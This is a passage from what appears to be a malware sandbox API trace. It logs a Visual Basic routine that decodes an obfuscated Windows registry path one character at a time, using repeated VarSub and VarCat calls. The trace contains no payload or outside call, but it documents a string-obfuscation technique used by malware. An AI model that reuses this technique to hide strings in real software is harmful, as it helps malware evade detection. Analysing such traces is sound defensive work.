lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.035] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0168.036] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.036] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.036] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.037] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.037] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.038] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0168.038] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.039] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0168.039] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.039] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0168.040] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.040] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.040] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.041] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.041] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.042] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.042] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.043] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0168.043] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.252] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0168.252] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.253] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.253] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.253] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.254] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.254] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0168.254] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.255] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0168.255] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.256] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0168.256] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.256] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0168.257] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.257] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0168.257] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.258] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.258] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.259] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0168.259] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.259] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.260] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.260] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.260] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.261] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0168.261] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.261] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.266] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.267] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0168.267] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.268] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.268] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.269] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.269] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.269] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.270] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.270] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.271] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.271] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0168.271] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.272] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.272] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.273] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.273] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.273] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0168.274] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.274] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.274] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.275] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.275] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.276] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.276] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.277] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.277] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, 